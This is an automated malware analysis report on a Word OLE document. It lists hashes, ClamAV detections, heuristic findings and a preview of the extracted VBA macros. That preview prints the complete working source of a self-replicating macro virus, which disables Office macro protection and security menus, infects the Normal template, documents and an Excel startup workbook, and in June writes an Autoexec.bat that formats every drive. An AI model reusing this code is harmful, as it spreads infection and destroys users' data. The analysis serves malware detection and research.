Office (OLE) malware analysis — malicious · e71c6ea5be8e2341

MALICIOUS

Office (OLE)

49.5 KB Created: 2014-03-11 01:14:00 Authoring application: Microsoft Office Word First seen: 2015-09-30

MD5: 9eb770022c14953d8401636cdedd4ac0 SHA-1: e4abfb66b43fff38de273418836e35d7c4b11c3b SHA-256: e71c6ea5be8e2341cc4b86432e4e82abcdac48c6364c8078b3e39e49312f194e

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros that attempt to disable macro security settings and replicate themselves across NormalTemplate and ActiveDocument. The macro also attempts to disable security-related menu items in the Office application. This behavior is indicative of malware aiming for persistence and evasion. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.Insert-9' further supports a malicious classification.

Heuristics 8

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xlApp = CreateObject("Excel.Application")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set WordObj = GetObject(, "Word.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5086 bytes
SHA-256: `2cf5ad2ef158251a23f04ca6ee67c94f73fa49929e58074116a88de2fb6a1eb4`
Detection ClamAV: Win.Trojan.Insert-9 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'HAHA! Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Application.ShowVisualBasicEditor = False If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1& End If For Each mItem In CommandBars("Tools").Controls If mItem.Caption = "选项(&O)..." Then mItem.Enabled = False End If If mItem.Caption = "模板和加载(&I)..." Then mItemmItem.Enabled = False End If If mItem.Caption = "自定义(&C)..." Then mItem.Enabled = False End If If mItem.Caption = "宏(&M)" Then mItem.Enabled = False End If Next mItem Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = Templates(1).VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If AD.Lines(1, 1) <> "'HAHA!" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, TT.Lines(1, TT.CountOfLines) If AD.Lines(1, 1) <> "'HAHA!" Then AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End If If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) End If Set xlApp = CreateObject("Excel.Application") If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines) Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1." Book1Obj.Close End If xlApp.Quit If Month(Now()) = 6 Then O = "C:\Autoexec.bat" Open O For Output As 1 Print #1, "@ echo off" Print #1, "format c: /autoexec/u" Print #1, "format d: /autoexec/u/select" Print #1, "format e: /autoexec/u/select" Print #1, "format f: /autoexec/u/select" Print #1, "format g: /autoexec/u/select" Print #1, "format h: /autoexec/u/select" Print #1, "format j: /autoexec/u/select" Print #1, "format l: /autoexec/u/select" Close End If End Sub Private Sub Document_New() Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = Templates(1).VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If AD.Lines(1, 1) <> "'HAHA!" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, TT.Lines(1, TT.CountOfLines) If AD.Lines(1, 1) <> "'HAHA!" Then AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End If If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) End If End Sub Private Sub Workbook_Deactivate() On Error Resume Next Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then Set xlApp = CreateObject("Excel.Application") Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountOfLines) Book1Obj.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False Book1Obj.Close xlApp.Quit Set WordObj = GetObject(, "Word.Application") If WordObj = "" Then Set WordObj = CreateObject("Word.Application") WQuit = True End If If WordObj.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") <> "" Then WordObj.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1& End If Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule WordObj.Options.SaveNormalPrompt = False If NT.Lines(1, 1) <> "'HAHA!" Then NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If Set NT = Nothing If WQuit = True Then WordObj.Quit End If If AW.Lines(1, 1) <> "'HAHA!" Then AW.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If If Month(Now()) = 6 Then O = "C:\Autoexec.bat" Open O For Output As 1 Print #1, "@ echo off" Print #1, "format c: /autoexec/u" Print #1, "format d: /autoexec/u/select" Print #1, "format e: /autoexec/u/select" Print #1, "format f: /autoexec/u/select" Print #1, "format g: /autoexec/u/select" Print #1, "format h: /autoexec/u/select" Print #1, "format j: /autoexec/u/select" Print #1, "format l: /autoexec/u/select" Close End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.